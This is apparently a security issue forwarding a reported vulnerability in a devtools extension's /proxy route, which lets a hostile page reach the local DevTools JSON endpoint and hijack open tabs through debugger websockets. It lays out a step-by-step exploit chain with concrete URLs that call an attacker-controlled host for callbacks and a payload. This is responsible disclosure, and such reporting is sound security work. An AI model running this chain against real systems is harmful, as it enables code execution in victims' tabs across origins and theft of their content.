[security] Devtools access vulnerability #56
Description
As reported by Adam Baldwin from andyet over email
Getting access to devtools
I'm curious to know what the /proxy route is actually used for on the
mod_strip extension? It allows for some interesting things. Specifically
one can use that route to load a page controlled by an attacker and
execute code.Further then that code could attempt to locate the port the devtools are
running on and find the various endpoints for the open tabs at the /json
endpoint.Normally this would be blocked by same origin policy but because of the
proxy route it's possible to get those endpoints. Having the content of
that json file means a debugger websocket connection can be made to each
of those tabs and code executed in the context of those tabs, which
gives xss on a variety of origins.It would be pretty messy to exploit but here is how I would go about it.
- Make requests to the following url to find the local port that allows
proxy.
127.0.0.1:PORT/proxy?url=http://evilpacket.net- Make requests to the following url to find the dev tools port that
will give me the json endpoints. When it hits the right one it will
notify the external service and we can correlate the 2 events.
http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net- Redirect user to the following url so that we can use same origin
policy to get the json in the next step
127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload- Get the JSON via a request to
127.0.0.1:PORT_FROM_STEP_1/proxy?> url=http://127.0.0.1:PORT_FROM_STEP_2/json- Parse json for ws url's
- Make web socket connections to each of those and do whatever with the
content on the tab's, etc acting as the devtools debugger over that ws
channel.